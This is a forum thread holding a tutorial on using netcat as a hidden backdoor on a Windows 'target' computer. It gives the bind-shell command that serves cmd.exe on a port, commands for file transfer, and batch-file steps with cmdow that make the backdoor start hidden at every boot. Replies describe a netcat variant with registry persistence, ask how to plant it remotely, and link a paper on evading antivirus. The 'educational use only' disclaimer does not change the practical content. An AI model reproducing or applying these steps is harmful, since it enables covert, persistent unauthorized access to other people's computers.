I was starting to search for this very topic and you explained it well. Thanks again. Keep up the great work!
Netcat Tutorial
I was recently looking for tutorials on google on how to use netcat as a backdoor. I thought I might as well post what I learned. I personally ran netcat on my linux computer and used it as the attacker and use my windows computer for the target computer.
--------------------------------------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~NetCatTutorial~~~~~~~~~~~~~~~ ~~~~
--------------------------------------------------------------------------------------------------------
Setting up and Connecting to a "target" comptuer
First off make sure you have netcat installed on your "attacking" computer and your "target" computer. It does not matter if the computer is running unix or windows.
To be able to connect to this "target" you must first start netcat on the "target" computer so your "attacking" computer can connect.
Windows: Open up a command prompt and make sure you are in the same directory as nc.exe (netcat). Then type "nc -L -p 10002 -d -e cmd.exe"
This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer open up a command prompt and type "nc 192.168.1.1 10002", this will connect you to your "target's" computer.
(I have not tested this on linux, I have only backdoored windows so I am not positive these commands work properly"
Unix: Open up a konsole. Then type "netcat -L -p 10002 -d -e konsole"
This will open up a port on 10002 for you to connect to on your "attacking" computer, and when you connect you will be at the "target" computer's command prompt. To connect to the "target" computer open up a command prompt and type "netcat 192.168.1.1 10002", this will connect you to your "target's" computer.
-L Tells netcat to not close and wait for a connection
-p Tells netcat which port to listen on
-d Tells netcat to detach from the process we want it to run
-e Tells netcat which program to run after the port is connected
Transferring files through netcat
To send a file through net cat enter the command "start nc.exe -l -p 1234 >file.txt" after you have connected to a windows machine. The -p 1234 is the port netcat listens on, >file.txt is the file to be recieved through netcat.
Enter this in a konsole on the "attacking" computer "netcat 192.168.1.1 1234 <file.txt".
Running netcat on startup hidden
Make a batch file with the command "nc -L -p 10002 -d -e cmd.exe" in it. Name this file start.bat and place it the root of your C drive. Download the program cmdow.exe. Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder.
Now everytime the computer boots netcat will start hidden.
--------------------------------------------------------------------------------------------------------
Package with all files used in the tutorial.
http://rapidshare.com/files/45658237...or.tar.gz.html
Mirrors
http://z13.zupload.com/download.php?...filepath=79690
http://www.sendspace.com/file/526t92
Disclaimer
This tutorial is for educational use only, please only use this information in a closed lab enviroment.
Credits
www.ol-service.com/sikurezza/doc/netcat_eng.pdf
A couple experts and a lot of information comes from this pdf
Nice work thanks for sharing this,
I was starting to search for this very topic and you explained it well. Thanks again. Keep up the great work!
15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
1000HE EEE 30 gig SSD 2 gigs Ram
Thanks. :-)
NetCat, great tool. Joseph nice work and its good to see there is still interested in such an old tool. I've added more functions to the original program here is my help list:
C:\MyCat 2.0\Release>wnc -h
[WildCat (wnc - v1.0) NT]
connect to somewhere: wnc [-options] hostname port[s] [ports] ...
listen for inbound: wnc -l -p port [options] [hostname] [port]
options:
-b beep sound a internal beep when connected
-B chatbeep sound a internal beep on inbound messages
-c commands give commands for fun stuff
-d detach detach from console, background mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h help this cruft
-H examples shows some usage examples
-i secs delay interval for lines sent, ports scanned
-l listen listen mode, for inbound connects
-L relisten listen harder, re-listen on socket close
-n numeric numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-P password password protect inbound/outbound connections
-r randomize randomize local and remote ports
-R reconnect to loop outbound connections in seconds
-s addr local source address
-S startup add startup key to registry
-t telnet answer TELNET negotiation
-u upd UDP mode
-v verbose verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z scanning zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
the source code is out there, if you know any C-C++ you can build your own version adding the functions you see fit.
peace
ahh good old netcat with a nice tutorial. Thanks
So netcat is basically a trojan? The main thing for me is getting netcat installed on the target PC. How do I do that without actually sitting at the target computer?
Even the crappiest antivirus can detect netcat so its only useful for a one shot deal where you don't care if your attack is logged.
Thanksthx
Nice work! Where we can download source code or binary of your WildCat? Please
Originally Posted by g1ic7h
" Even the crappiest antivirus can detect netcat so its only useful for a one shot deal where you don't care if your attack is logged."
A good article on how to avoid AV detection by altering Netcat"s signature can be found at :
http://packetstormsecurity.org/paper...ack_Netcat.pdf
Fletch
Posting Permissions